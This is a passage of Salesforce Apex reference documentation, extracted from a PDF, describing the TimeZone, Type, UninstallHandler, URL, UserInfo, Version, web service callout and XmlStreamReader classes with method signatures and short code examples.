Parameters
hour
Type: Integer
minutes
Type: Integer
seconds
Type: Integer
milliseconds
Type: Integer
Return Value
Type: Time
Example
The following example creates a time of 18:30:2:20.
Time myTime =
Time.newInstance(18, 30, 2, 20);
second()
Returns the second component of a Time.
Signature
public Integer second()
Return Value
Type: Integer
Example
Time myTime = Time.newInstance(3, 14, 15, 926);
System.assertEquals(15, myTime.second());
TimeZone Class
Represents a time zone. Contains methods for creating a new time zone and obtaining time zone properties, such as the time zone ID,
offset, and display name.
Namespace
System
1824
Reference
TimeZone Class
Usage
You can use the methods in this class to get properties of a time zone, such as the properties of the time zone returned by
UserInfo.getTimeZone, or the time zone returned by getTimeZone of this class.
Example
This example shows how to get properties of the current users time zone and displays them to the debug log.
TimeZone tz = UserInfo.getTimeZone();
System.debug('Display name: ' + tz.getDisplayName());
System.debug('ID: ' + tz.getID());
// During daylight saving time for the America/Los_Angeles time zone
System.debug('Offset: ' + tz.getOffset(DateTime.newInstance(2012,10,23,12,0,0)));
// Not during daylight saving time for the America/Los_Angeles time zone
System.debug('Offset: ' + tz.getOffset(DateTime.newInstance(2012,11,23,12,0,0)));
System.debug('String format: ' + tz.toString());
The output of this sample varies based on the user's time zone. This is an example output if the users time zone is America/Los_Angeles.
For this time zone, daylight saving time is -7 hours from GMT (-25200000 milliseconds) and standard time is -8 hours from GMT (-28800000
milliseconds).
Display name: Pacific Standard Time
ID: America/Los_Angeles
Offset: -25200000
Offset: -28800000
String format: America/Los_Angeles
TimeZone Methods
The following are methods for TimeZone.
IN THIS SECTION:
getDisplayName()
Returns this time zones display name.
getID()
Returns this time zones ID.
getOffset(Datetime)
Returns the time zone offset, in milliseconds, of the specified date to the GMT time zone.
getTimeZone(String)
Returns the time zone corresponding to the specified time zone ID.
toString()
Returns the string representation of this time zone.
getDisplayName()
Returns this time zones display name.
1825
Reference
TimeZone Class
Signature
public String getDisplayName()
Return Value
Type: String
getID()
Returns this time zones ID.
Signature
public String getID()
Return Value
Type: String
getOffset(Datetime)
Returns the time zone offset, in milliseconds, of the specified date to the GMT time zone.
Signature
public Integer getOffset(Datetime date)
Parameters
date
Type: Datetime
The date argument is the date and time to evaluate.
Return Value
Type: Integer
Usage
Note: The returned offset is adjusted for daylight saving time if the date argument falls within daylight saving time for this time
zone.
getTimeZone(String)
Returns the time zone corresponding to the specified time zone ID.
Signature
public static TimeZone getTimeZone(String Id)
1826
Reference
Type Class
Parameters
Id
Type: String
The time zone values you can use for the Id argument are any valid time zone values that the Java TimeZone class supports.
Return Value
Type: TimeZone
Example
TimeZone tz =
TimeZone.getTimeZone(
'America/Los_Angeles');
System.assertEquals(
'Pacific Standard Time',
tz.getDisplayName());
toString()
Returns the string representation of this time zone.
Signature
public String toString()
Return Value
Type: String
Type Class
Contains methods for getting the Apex type that corresponds to an Apex class and for instantiating new types.
Namespace
System
Usage
Use the forName methods to retrieve the type of an Apex class, which can be a built-in or a user-defined class. Also, use the
newInstance method if you want to instantiate a Type that implements an interface and call its methods while letting someone
else, such as a subscriber of your package, provide the methods implementations.
1827
Reference
Type Class
get the name of the class that implements the interface through a custom setting in the subscribers org. The package can then instantiate
the type that corresponds to this class name and invoke the methods that the subscriber implemented.
In this sample, Vehicle represents the interface that the VehicleImpl class implements. The last class contains the code sample
that invokes the methods implemented in VehicleImpl.
This is the Vehicle interface.
global interface Vehicle {
Long getMaxSpeed();
String getType();
}
The method in this class gets the name of the class that implements the Vehicle interface through a custom setting value. It then
instantiates this class by getting the corresponding type and calling the newInstance method. Next, it invokes the methods
implemented in VehicleImpl. This sample requires that you create a public list custom setting named CustomImplementation
with a text field named className. Create one record for this custom setting with a data set name of Vehicle and a class name
value of VehicleImpl.
public class CustomerImplInvocationClass {
public static void invokeCustomImpl() {
// Get the class name from a custom setting.
// This class implements the Vehicle interface.
CustomImplementation__c cs = CustomImplementation__c.getInstance('Vehicle');
// Get the Type corresponding to the class name
Type t = Type.forName(cs.className__c);
// Instantiate the type.
// The type of the instantiated object
//
is the interface.
Vehicle v = (Vehicle)t.newInstance();
// Call the methods that have a custom implementation
System.debug('Max speed: ' + v.getMaxSpeed());
System.debug('Vehicle type: ' + v.getType());
}
}
Class Property
The class property returns the System.Type of the type it is called on. It is exposed on all Apex built-in types including primitive
data types and collections, sObject types, and user-defined classes. This property can be used instead of forName methods.
Call this property on the type name. For example:
System.Type t = Integer.class;
1828
Reference
Type Class
You can use this property for the second argument of JSON.deserialize, deserializeStrict,
JSONParser.readValueAs, and readValueAsStrict methods to get the type of the object to deserialize. For example:
Decimal n = (Decimal)JSON.deserialize('100.1', Decimal.class);
Type Methods
The following are methods for Type.
IN THIS SECTION:
equals(Object)
Returns true if the specified type is equal to the current type; otherwise, returns false.
forName(String)
Returns the type that corresponds to the specified fully qualified class name.
forName(String, String)
Returns the type that corresponds to the specified namespace and class name.
getName()
Returns the name of the current type.
hashCode()
Returns a hash code value for the current type.
newInstance()
Creates an instance of the current type and returns this new instance.
toString()
Returns a string representation of the current type, which is the type name.
equals(Object)
Returns true if the specified type is equal to the current type; otherwise, returns false.
Signature
public Boolean equals(Object toCompare)
Parameters
toCompare
Type: Object
The type to compare with the current type.
Return Value
Type: Boolean
1829
Reference
Type Class
Example
Type t1 = Account.class;
Type t2 = Type.forName('Account');
System.assert(t1.equals(t2));
forName(String)
Returns the type that corresponds to the specified fully qualified class name.
Signature
public static System.Type forName(String fullyQualifiedName)
Parameters
fullyQualifiedName
Type: String
The fully qualified name of the class to get the type of. The fully qualified class name contains the namespace name, for example,
MyNamespace.ClassName.
Return Value
Type: System.Type
Usage
Note:
This method returns null if called outside a managed package to get the type of a non-global class in a managed package.
This is because the non-global class is not visible outside the managed package. For Apex saved using Salesforce API version
27.0 and earlier, this method does return the corresponding class type for the non-global managed package class.
When called from an installed managed package to get the name of a local type in an organization with no defined namespace,
the forName(fullyQualifiedName) method returns null. Instead, use the forName(namespace, name)
method and specify an empty string or null for the namespace argument.
forName(String, String)
Returns the type that corresponds to the specified namespace and class name.
Signature
public static System.Type forName(String namespace, String name)
Parameters
namespace
Type: String
The namespace of the class. If the class doesn't have a namespace, set the namespace argument to null or an empty string.
1830
Reference
Type Class
name
Type: String
The name of the class.
Return Value
Type: System.Type
Usage
Note:
This method returns null if called outside a managed package to get the type of a non-global class in a managed package.
This is because the non-global class is not visible outside the managed package. For Apex saved using Salesforce API version
27.0 and earlier, this method does return the corresponding class type for the non-global managed package class.
Use this method instead of forName(fullyQualifiedName) if it will be called from a managed package installed
in an organization with no defined namespace. To get the name of a local type, set the namespace argument to an empty
string or null. For example, Type t = Type.forName('', 'ClassName');.
Example
This example shows how to get the type that corresponds to the ClassName class and the MyNamespace namespace.
Type myType =
Type.forName('MyNamespace', 'ClassName');
getName()
Returns the name of the current type.
Signature
public String getName()
Return Value
Type: String
Example
This example shows how to get a Types name. It first obtains a Type by calling forName, then calls getName on the Type object.
Type t =
Type.forName('MyClassName');
String typeName =
t.getName();
System.assertEquals('MyClassName',
typeName);
1831
Reference
Type Class
hashCode()
Returns a hash code value for the current type.
Signature
public Integer hashCode()
Return Value
Type: Integer
Usage
The returned hash code value corresponds to the type name hash code that String.hashCode returns.
newInstance()
Creates an instance of the current type and returns this new instance.
Signature
public Object newInstance()
Return Value
Type: Object
Usage
Because newInstance returns the generic object type, you should cast the return value to the type of the variable that will hold this
value.
This method enables you to instantiate a Type that implements an interface and call its methods while letting someone else provide
the methods implementation. For example, a package developer can provide an interface that a subscriber who installs the package
can implement. The code in the package calls the subscriber's implementation of the interface methods by instantiating the subscribers
Type.
Note: Calling this method on a type corresponding to a class that has a private no-argument constructor results in a
System.TypeException, as expected because the type cant be instantiated. For Apex saved using Salesforce API version
28.0 and earlier, this method returns an instance of the class instead.
Example
This example shows how to create an instance of a Type. It first gets a Type by calling forName with the name of a class (ShapeImpl),
then calls newInstance on this Type object. The newObj instance is declared with the interface type (Shape) that the ShapeImpl
class implements. The return value of the newInstance method is cast to the Shape type.
Type t =
Type.forName('ShapeImpl');
Shape newObj =
(Shape)t.newInstance();
1832
Reference
UninstallHandler Interface
toString()
Returns a string representation of the current type, which is the type name.
Signature
public String toString()
Return Value
Type: String
Usage
This method returns the same value as getName. String.valueOf and System.debug use this method to convert their
Type argument into a String.
Example
This example calls toString on the Type corresponding to a list of Integers.
Type t = List<Integer>.class;
String s = t.toString();
System.assertEquals('LIST<Integer>', s);
UninstallHandler Interface
Enables custom code to run after a managed package is uninstalled.
Namespace
System
Usage
App developers can implement this interface to specify Apex code that runs automatically after a subscriber uninstalls a managed
package. This makes it possible to perform cleanup and notification tasks based on details of the subscribers organization.
The uninstall script is subject to default governor limits. It runs as a special system user that represents your package, so all operations
performed by the script will appear to be done by your package. You can access this user by using UserInfo. You will only see this user
at runtime, not while running tests.
If the script fails, the uninstall continues but none of the changes performed by the script are committed. Any errors in the script are
emailed to the user specified in the Notify on Apex Error field of the package. If no user is specified, the uninstall details will be
unavailable.
The uninstall script has the following restrictions. You cant use it to initiate batch, scheduled, and future jobs, to access Session IDs, or
to perform callouts.
1833
Reference
UninstallHandler Interface
The UninstallHandler interface has a single method called onUninstall, which specifies the actions to be performed on
uninstall.
global interface UninstallHandler {
void onUninstall(UninstallContext context)};
The onUninstall method takes a context object as its argument, which provides the following information.
The org ID of the organization in which the uninstall takes place.
The user ID of the user who initiated the uninstall.
The context argument is an object whose type is the UninstallContext interface. This interface is automatically implemented
by the system. The following definition of the UninstallContext interface shows the methods you can call on the context
argument.
global interface UninstallContext {
ID organizationId();
ID uninstallerId();
}
IN THIS SECTION:
UninstallHandler Methods
UninstallHandler Example Implementation
UninstallHandler Methods
The following are methods for UninstallHandler.
IN THIS SECTION:
onUninstall(UninstallContext)
Specifies the actions to be performed on uninstall.
onUninstall(UninstallContext)
Specifies the actions to be performed on uninstall.
Signature
public Void onUninstall(UninstallContext context)
Parameters
context
Type: UninstallContext
Return Value
Type: Void
1834
Reference
URL Class
You can test an uninstall script using the testUninstall method of the Test class. This method takes as its argument a class
that implements the UninstallHandler interface.
This sample shows how to test an uninstall script implemented in the UninstallClass Apex class.
@isTest
static void testUninstallScript() {
Id UninstallerId = UserInfo.getUserId();
List<FeedItem> feedPostsBefore =
[SELECT Id FROM FeedItem WHERE parentId=:UninstallerId AND CreatedDate=TODAY];
Test.testUninstall(new UninstallClass());
List<FeedItem> feedPostsAfter =
[SELECT Id FROM FeedItem WHERE parentId=:UninstallerId AND CreatedDate=TODAY];
System.assertEquals(feedPostsBefore.size() + 1, feedPostsAfter.size(),
'Post to uninstaller failed.');
}
URL Class
Represents a uniform resource locator (URL) and provides access to parts of the URL. Enables access to the Salesforce instance URL.
1835
Reference
URL Class
Namespace
System
Usage
Use the methods of the System.URL class to create links to objects in your organization. Such objects can be files, images, logos, or
records that you want to include in external emails, in activities, or in Chatter posts. For example, you can create a link to a file uploaded
as an attachment to a Chatter post by concatenating the Salesforce base URL with the file ID, as shown in the following example:
// Get a file uploaded through Chatter.
ContentDocument doc = [SELECT Id FROM ContentDocument
WHERE Title = 'myfile'];
// Create a link to the file.
String fullFileURL = URL.getSalesforceBaseUrl().toExternalForm() +
'/' + doc.id;
system.debug(fullFileURL);
The following example creates a link to a Salesforce record. The full URL is created by concatenating the Salesforce base URL with the
record ID.
Account acct = [SELECT Id FROM Account WHERE Name = 'Acme' LIMIT 1];
String fullRecordURL = URL.getSalesforceBaseUrl().toExternalForm() + '/' + acct.Id;
Example
In this example, the base URL and the full request URL of the current Salesforce server instance are retrieved. Next, a URL pointing to a
specific account object is created. Finally, components of the base and full URL are obtained. This example prints out all the results to
the debug log output.
// Create a new account called Acme that we will create a link for later.
Account myAccount = new Account(Name='Acme');
insert myAccount;
// Get the base URL.
String sfdcBaseURL = URL.getSalesforceBaseUrl().toExternalForm();
System.debug('Base URL: ' + sfdcBaseURL );
// Get the URL for the current request.
String currentRequestURL = URL.getCurrentRequestUrl().toExternalForm();
System.debug('Current request URL: ' + currentRequestURL);
// Create the account URL from the base URL.
String accountURL = URL.getSalesforceBaseUrl().toExternalForm() +
'/' + myAccount.Id;
System.debug('URL of a particular account: ' + accountURL);
// Get some parts of the base URL.
System.debug('Host: ' + URL.getSalesforceBaseUrl().getHost());
System.debug('Protocol: ' + URL.getSalesforceBaseUrl().getProtocol());
// Get the query string of the current request.
System.debug('Query: ' + URL.getCurrentRequestUrl().getQuery());
1836
Reference
URL Class
IN THIS SECTION:
URL Constructors
URL Methods
URL Constructors
The following are constructors for URL.
IN THIS SECTION:
URL(String)
Creates a new instance of the URL class using the specified string representation of the URL.
URL(URL, String)
Creates a new instance of the URL class by parsing the specified spec within the specified context.
URL(String, String, String)
Creates a new instance of the URL class using the specified protocol, host, and file on the host. The default port for the specified
protocol is used.
URL(String, String, Integer, String)
Creates a new instance of the URL class using the specified protocol, host, port, and file on the host.
URL(String)
Creates a new instance of the URL class using the specified string representation of the URL.
Signature
public Url(String spec)
Parameters
spec
Type: String
The string to parse as a URL.
URL(URL, String)
Creates a new instance of the URL class by parsing the specified spec within the specified context.
Signature
public Url(Url context, String spec)
Parameters
context
1837
Reference
URL Class
spec
Type: String
The string to parse as a URL.
Usage
The new URL is created from the given context URL and the spec argument as described in RFC2396 "Uniform Resource Identifiers :
Generic * Syntax" :
<scheme>://<authority><path>?<query>#<fragment>
For more information about the arguments of this constructor, see the corresponding URL(java.net.URL, java.lang.String) constructor for
Java.
Signature
public Url(String protocol, String host, String file)
Parameters
protocol
Type: String
The protocol name for this URL.
host
Type: String
The host name for this URL.
file
Type: String
The file name for this URL.
Signature
public Url(String protocol, String host, Integer port, String file)
Parameters
protocol
Type: String
The protocol name for this URL.
1838
Reference
URL Class
host
Type: String
The host name for this URL.
port
Type: Integer
The port number for this URL.
file
Type: String
The file name for this URL.
URL Methods
The following are methods for URL.
IN THIS SECTION:
getAuthority()
Returns the authority portion of the current URL.
getCurrentRequestUrl()
Returns the URL of an entire request on a Salesforce instance.
getDefaultPort()
Returns the default port number of the protocol associated with the current URL.
getFile()
Returns the file name of the current URL.
getFileFieldURL(String, String)
Returns the download URL for a file attachment.
getHost()
Returns the host name of the current URL.
getPath()
Returns the path portion of the current URL.
getPort()
Returns the port of the current URL.
getProtocol()
Returns the protocol name of the current URL, such as, https.
getQuery()
Returns the query portion of the current URL.
getRef()
Returns the anchor of the current URL.
getSalesforceBaseUrl()
Returns the URL of the Salesforce instance.
getUserInfo()
Gets the UserInfo portion of the current URL.
1839
Reference
URL Class
sameFile(System.URL)
Compares the current URL with the specified URL object, excluding the fragment component.
toExternalForm()
Returns a string representation of the current URL.
getAuthority()
Returns the authority portion of the current URL.
Signature
public String getAuthority()
Return Value
Type: String
getCurrentRequestUrl()
Returns the URL of an entire request on a Salesforce instance.
Signature
public static System.URL getCurrentRequestUrl()
Return Value
Type: System.URL
Usage
An example of a URL for an entire request is https://na1.salesforce.com/apex/myVfPage.apexp.
getDefaultPort()
Returns the default port number of the protocol associated with the current URL.
Signature
public Integer getDefaultPort()
Return Value
Type: Integer
Usage
Returns -1 if the URL scheme or the stream protocol handler for the URL doesn't define a default port number.
1840
Reference
URL Class
getFile()
Returns the file name of the current URL.
Signature
public String getFile()
Return Value
Type: String
getFileFieldURL(String, String)
Returns the download URL for a file attachment.
Signature
public static String getFileFieldURL(String entityId, String fieldName)
Parameters
entityId
Type: String
Specifies the ID of the entity that holds the file data.
fieldName
Type: String
Specifies the API name of a file field component, such as AttachmentBody.
Return Value
Type: String
Usage
Example:
Example
String fileURL =
URL.getFileFieldURL(
'087000000000123' ,
'AttachmentBody');
getHost()
Returns the host name of the current URL.
1841
Reference
URL Class
Signature
public String getHost()
Return Value
Type: String
getPath()
Returns the path portion of the current URL.
Signature
public String getPath()
Return Value
Type: String
getPort()
Returns the port of the current URL.
Signature
public Integer getPort()
Return Value
Type: Integer
getProtocol()
Returns the protocol name of the current URL, such as, https.
Signature
public String getProtocol()
Return Value
Type: String
getQuery()
Returns the query portion of the current URL.
Signature
public String getQuery()
1842
Reference
URL Class
Return Value
Type: String
Usage
Returns null if no query portion exists.
getRef()
Returns the anchor of the current URL.
Signature
public String getRef()
Return Value
Type: String
Usage
Returns null if no query portion exists.
getSalesforceBaseUrl()
Returns the URL of the Salesforce instance.
Signature
public static System.URL getSalesforceBaseUrl()
Return Value
Type: System.URL
Usage
An example of an instance URL is https://na1.salesforce.com.
getUserInfo()
Gets the UserInfo portion of the current URL.
Signature
public String getUserInfo()
Return Value
Type: String
1843
Reference
UserInfo Class
Usage
Returns null if no UserInfo portion exists.
sameFile(System.URL)
Compares the current URL with the specified URL object, excluding the fragment component.
Signature
public Boolean sameFile(System.URL URLToCompare)
Parameters
URLToCompare
Type: System.URL
Return Value
Type: Boolean
Returns true if both URL objects reference the same remote resource; otherwise, returns false.
Usage
For more information about the syntax of URIs and fragment components, see RFC3986.
toExternalForm()
Returns a string representation of the current URL.
Signature
public String toExternalForm()
Return Value
Type: String
UserInfo Class
Contains methods for obtaining information about the context user.
Namespace
System
UserInfo Methods
The following are methods for UserInfo. All methods are static.
1844
Reference
UserInfo Class
IN THIS SECTION:
getDefaultCurrency()
Returns the context user's default currency code for multiple currency organizations or the organization's currency code for single
currency organizations.
getFirstName()
Returns the context user's first name
getLanguage()
Returns the context user's language
getLastName()
Returns the context user's last name
getLocale()
Returns the context user's locale.
getName()
Returns the context user's full name. The format of the name depends on the language preferences specified for the organization.
getOrganizationId()
Returns the context organization's ID.
getOrganizationName()
Returns the context organization's company name.
getProfileId()
Returns the context user's profile ID.
getSessionId()
Returns the session ID for the current session.
getTimeZone()
Returns the current users local time zone.
getUiTheme()
Returns the default organization theme. Use getUiThemeDisplayed to determine the theme actually displayed to the current
user.
getUiThemeDisplayed()
Returns the theme being displayed for the current user.
getUserEmail()
Returns the current users email address.
getUserId()
Returns the context user's ID
getUserName()
Returns the context user's login name.
getUserRoleId()
Returns the context user's role ID.
getUserType()
Returns the context user's type.
isCurrentUserLicensed(namespace)
Returns true if the context user has a license to the managed package denoted by the namespace. Otherwise, returns false.
1845
Reference
UserInfo Class
isMultiCurrencyOrganization()
Specifies whether the organization uses multiple currencies.
getDefaultCurrency()
Returns the context user's default currency code for multiple currency organizations or the organization's currency code for single
currency organizations.
Signature
public static String getDefaultCurrency()
Return Value
Type: String
Usage
Note: For Apex saved using SalesforceAPI version 22.0 or earlier, getDefaultCurrency returns null for single currency
organizations.
getFirstName()
Returns the context user's first name
Signature
public static String getFirstName()
Return Value
Type: String
getLanguage()
Returns the context user's language
Signature
public static String getLanguage()
Return Value
Type: String
getLastName()
Returns the context user's last name
1846
Reference
UserInfo Class
Signature
public static String getLastName()
Return Value
Type: String
getLocale()
Returns the context user's locale.
Signature
public static String getLocale()
Return Value
Type: String
Example
String result = UserInfo.getLocale();
System.assertEquals('en_US', result);
getName()
Returns the context user's full name. The format of the name depends on the language preferences specified for the organization.
Signature
public static String getName()
Return Value
Type: String
Usage
The format is one of the following:
FirstName LastName
LastName, FirstName
getOrganizationId()
Returns the context organization's ID.
Signature
public static String getOrganizationId()
1847
Reference
UserInfo Class
Return Value
Type: String
getOrganizationName()
Returns the context organization's company name.
Signature
public static String getOrganizationName()
Return Value
Type: String
getProfileId()
Returns the context user's profile ID.
Signature
public static String getProfileId()
Return Value
Type: String
getSessionId()
Returns the session ID for the current session.
Signature
public static String getSessionId()
Return Value
Type: String
Usage
For Apex code that is executed asynchronously, such as @future methods, Batch Apex jobs, or scheduled Apex jobs, getSessionId
returns null.
As a best practice, ensure that your code handles both cases when a session ID is or is not available.
getTimeZone()
Returns the current users local time zone.
1848
Reference
UserInfo Class
Signature
public static System.TimeZone getTimeZone()
Return Value
Type: System.TimeZone
Example
TimeZone tz =
UserInfo.getTimeZone();
System.debug(
'Display name: ' +
tz.getDisplayName());
System.debug(
'ID: ' +
tz.getID());
getUiTheme()
Returns the default organization theme. Use getUiThemeDisplayed to determine the theme actually displayed to the current
user.
Signature
public static String getUiTheme()
Return Value
Type: String
The default organization theme.
Valid values include:
Theme1
Theme2
Theme3
Theme4
PortalDefault
Webstore
getUiThemeDisplayed()
Returns the theme being displayed for the current user.
Signature
public static String getUiThemeDisplayed()
1849
Reference
UserInfo Class
Return Value
Type: String
The theme being displayed for the current user
Valid values include:
Theme1
Theme2
Theme3
Theme4
PortalDefault
Webstore
getUserEmail()
Returns the current users email address.
Signature
public static String getUserEmail()
Return Value
Type: String
Example
String emailAddress =
UserInfo.getUserEmail();
System.debug(
'Email address: ' +
emailAddress);
getUserId()
Returns the context user's ID
Signature
public static String getUserId()
Return Value
Type: String
getUserName()
Returns the context user's login name.
1850
Reference
UserInfo Class
Signature
public static String getUserName()
Return Value
Type: String
getUserRoleId()
Returns the context user's role ID.
Signature
public static String getUserRoleId()
Return Value
Type: String
getUserType()
Returns the context user's type.
Signature
public static String getUserType()
Return Value
Type: String
isCurrentUserLicensed(namespace)
Returns true if the context user has a license to the managed package denoted by the namespace. Otherwise, returns false.
Signature
public static Boolean isCurrentUserLicensed(String namespace)
Parameters
namespace
Type: String
Return Value
Type: Boolean
Usage
A TypeException is thrown if namespace is an invalid parameter.
1851
Reference
Version Class
isMultiCurrencyOrganization()
Specifies whether the organization uses multiple currencies.
Signature
public static Boolean isMultiCurrencyOrganization()
Return Value
Type: Boolean
Version Class
Use the Version methods to get the version of a managed package of a subscriber and to compare package versions.
Namespace
System
Usage
A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release.
A called component can check the version against which the caller was compiled using the System.requestVersion method
and behave differently depending on the callers expectations. This allows you to continue to support existing behavior in classes and
triggers in previous package versions while continuing to evolve the code.
The value returned by the System.requestVersion method is an instance of this class with a two-part version number containing
a major and a minor number. Since the System.requestVersion method doesnt return a patch number, the patch number in
the returned Version object is null.
The System.Version class can also hold also a three-part version number that includes a patch number.
Example
This example shows how to use the methods in this class, along with the requestVersion method, to determine the managed
package version of the code that is calling your package.
if (System.requestVersion() == new Version(1,0))
{
// Do something
}
if ((System.requestVersion().major() == 1)
&& (System.requestVersion().minor() > 0)
&& (System.requestVersion().minor() <=9))
{
// Do something different for versions 1.1 to 1.9
}
else if (System.requestVersion().compareTo(new Version(2,0)) >= 0)
{
1852
Reference
Version Class
IN THIS SECTION:
Version Constructors
Version Methods
Version Constructors
The following are constructors for Version.
IN THIS SECTION:
Version(Integer, Integer)
Creates a new instance of the Version class as a two-part package version using the specified major and minor version numbers.
Version(Integer, Integer, Integer)
Creates a new instance of the Version class as a three-part package version using the specified major, minor, and patch version
numbers.
Version(Integer, Integer)
Creates a new instance of the Version class as a two-part package version using the specified major and minor version numbers.
Signature
public Version(Integer major, Integer minor)
Parameters
major
Type: Integer
The major version number.
minor
Type: Integer
The minor version number.
Signature
public Version(Integer major, Integer minor, Integer patch)
1853
Reference
Version Class
Parameters
major
Type: Integer
The major version number.
minor
Type: Integer
The minor version number.
patch
Type: Integer
The patch version number.
Version Methods
The following are methods for Version. All are instance methods.
IN THIS SECTION:
compareTo(System.Version)
Compares the current version with the specified version.
major()
Returns the major package version of the of the calling code.
minor()
Returns the minor package version of the calling code.
patch()
Returns the patch package version of the calling code or null if there is no patch version.
compareTo(System.Version)
Compares the current version with the specified version.
Signature
public Integer compareTo(System.Version version)
Parameters
version
Type: System.Version
Return Value
Type: Integer
Returns one of the following values:
zero if the current package version is equal to the specified package version
an Integer value greater than zero if the current package version is greater than the specified package version
1854
Reference
WebServiceCallout Class
an Integer value less than zero if the current package version is less than the specified package version
Usage
If a two-part version is being compared to a three-part version, the patch number is ignored and the comparison is based only on the
major and minor numbers.
major()
Returns the major package version of the of the calling code.
Signature
public Integer major()
Return Value
Type: Integer
minor()
Returns the minor package version of the calling code.
Signature
public Integer minor()
Return Value
Type: Integer
patch()
Returns the patch package version of the calling code or null if there is no patch version.
Signature
public Integer patch()
Return Value
Type: Integer
WebServiceCallout Class
Enables making callouts to SOAP operations on an external Web service. This class is used in the Apex stub class that is auto-generated
from a WSDL.
1855
Reference
WebServiceCallout Class
Namespace
System
IN THIS SECTION:
WebServiceCallout Methods
SEE ALSO:
SOAP Services: Defining a Class from a WSDL Document
WebServiceCallout Methods
The following is the static method for WebServiceCallout.
IN THIS SECTION:
invoke(Object, Object, Map<String, Object>, List<String>)
Invokes an external SOAP Web service operation based on an Apex class that is auto-generated from a WSDL.
Signature
public static void invoke(Object stub, Object request, Map<String, Object> response,
List<String> info)
Parameters
stub
Type: Object
An instance of the Apex class that is auto-generated from a WSDL (the stub class).
request
Type: Object
The request to the external service. The request is an instance of a type that is created as part of the auto-generated stub class.
response
Type: String[]
An array of strings that contains information about the calloutWeb service endpoint, SOAP action, request, and response. The
order of the elements in the array matters.
1856
Reference
WebServiceMock Interface
Element at index 0 ([0]): The endpoint URL of the external Web service. For example:
'http://YourServer/YourService'
Return Value
Type: Void
WebServiceMock Interface
Enables sending fake responses when testing Web service callouts of a class auto-generated from a WSDL.
Namespace
System
Usage
For an implementation example, see Testing Web Service Callouts on page 341.
WebServiceMock Methods
The following are methods for WebServiceMock.
IN THIS SECTION:
doInvoke(Object, Object, Map<String, Object>, String, String, String, String, String, String)
The implementation of this method is called by the Apex runtime to send a fake response when a Web service callout is made after
Test.setMock has been called.
doInvoke(Object, Object, Map<String, Object>, String, String, String, String, String, String)
The implementation of this method is called by the Apex runtime to send a fake response when a Web service callout is made after
Test.setMock has been called.
Signature
public Void doInvoke(Object stub, Object request, Map<String, Object> response, String
endpoint, String soapAction, String requestName, String responseNS, String responseName,
String responseType)
1857
Reference
XmlStreamReader Class
Parameters
stub
Type: Object
An instance of the auto-generated class.
request
Type: Object
The SOAP Web service request being invoked.
response
Type: String
The endpoint URL for the request.
soapAction
Type: String
The requested SOAP operation.
requestName
Type: String
The requested SOAP operation name.
responseNS
Type: String
The response namespace.
responseName
Type: String
The name of the response element as defined in the WSDL.
responseType
Type: String
The class for the response as defined in the auto-generated class.
Return Value
Type: Void
Usage
XmlStreamReader Class
The XmlStreamReader class provides methods for forward, read-only access to XML data. You can pull data from XML or skip
unwanted events.
1858
Reference
XmlStreamReader Class
Namespace
System
Usage
The XmlStreamReader class is similar to the XMLStreamReader utility class from StAX.
Note: The XmlStreamReader class in Apex is based on its counterpart in Java. See
java.xml.stream.XMLStreamReader.
IN THIS SECTION:
XmlStreamReader Constructors
XmlStreamReader Methods
XmlStreamReader Constructors
The following are constructors for XmlStreamReader.
IN THIS SECTION:
XmlStreamReader(String)
Creates a new instance of the XmlStreamReader class for the specified XML input.
XmlStreamReader(String)
Creates a new instance of the XmlStreamReader class for the specified XML input.
Signature
public XmlStreamReader(String xmlInput)
Parameters
xmlInput
Type: String
The XML string input.
XmlStreamReader Methods
The following are methods for XmlStreamReader. All are instance methods.
IN THIS SECTION:
getAttributeCount()
Returns the number of attributes on the start element, excluding namespace definitions.
getAttributeLocalName(Integer)
Returns the local name of the attribute at the specified index.
1859
Reference
XmlStreamReader Class
getAttributeNamespace(Integer)
Returns the namespace URI of the attribute at the specified index.
getAttributePrefix(Integer)
Returns the prefix of this attribute at the specified index.
getAttributeType(Integer)
Returns the XML type of the attribute at the specified index.
getAttributeValue(String, String)
Returns the value of the attribute in the specified localName at the specified URI.
getAttributeValueAt(Integer)
Returns the value of the attribute at the specified index.
getEventType()
Returns the type of XML event the cursor is pointing to.
getLocalName()
Returns the local name of the current event.
getLocation()
Return the current location of the cursor.
getNamespace()
If the current event is a start element or end element, this method returns the URI of the prefix or the default namespace.
getNamespaceCount()
Returns the number of namespaces declared on a start element or end element.
getNamespacePrefix(Integer)
Returns the prefix for the namespace declared at the index.
getNamespaceURI(String)
Return the URI for the given prefix.
getNamespaceURIAt(Integer)
Returns the URI for the namespace declared at the index.
getPIData()
Returns the data section of a processing instruction.
getPITarget()
Returns the target section of a processing instruction.
getPrefix()
Returns the prefix of the current XML event or null if the event does not have a prefix.
getText()
Returns the current value of the XML event as a string.
getVersion()
Returns the XML version specified on the XML declaration. Returns null if none was declared.
hasName()
Returns true if the current XML event has a name. Returns false otherwise.
hasNext()
Returns true if there are more XML events and false if there are no more XML events.
1860
Reference
XmlStreamReader Class
hasText()
Returns true if the current event has text, false otherwise.
isCharacters()
Returns true if the cursor points to a character data XML event. Otherwise, returns false.
isEndElement()
Returns true if the cursor points to an end tag. Otherwise, it returns false.
isStartElement()
Returns true if the cursor points to a start tag. Otherwise, it returns false.
isWhiteSpace()
Returns true if the cursor points to a character data XML event that consists of all white space. Otherwise it returns false.
next()
Reads the next XML event. A processor may return all contiguous character data in a single chunk, or it may split it into several
chunks. Returns an integer which indicates the type of event.
nextTag()
Skips any white space (the isWhiteSpace method returns true), comment, or processing instruction XML events, until a start
element or end element is reached. Returns the index for that XML event.
setCoalescing(Boolean)
If you specify true for returnAsSingleBlock, text is returned in a single block, from a start element to the first end element
or the next start element, whichever comes first. If you specify it as false, the parser may return text in multiple blocks.
setNamespaceAware(Boolean)
If you specify true for isNamespaceAware, the parser recognizes namespace. If you specify it as false, the parser does
not. The default value is true.
toString()
Returns a string containing the length of the input XML given to XmlStreamReader and the first 50 characters of the input
XML.
getAttributeCount()
Returns the number of attributes on the start element, excluding namespace definitions.
Signature
public Integer getAttributeCount()
Return Value
Type: Integer
Usage
This method is only valid on a start element or attribute XML events. The count for the number of attributes for an attribute XML event
starts with zero.
getAttributeLocalName(Integer)
Returns the local name of the attribute at the specified index.
1861
Reference
XmlStreamReader Class
Signature
public String getAttributeLocalName(Integer index)
Parameters
index
Type: Integer
Return Value
Type: String
Usage
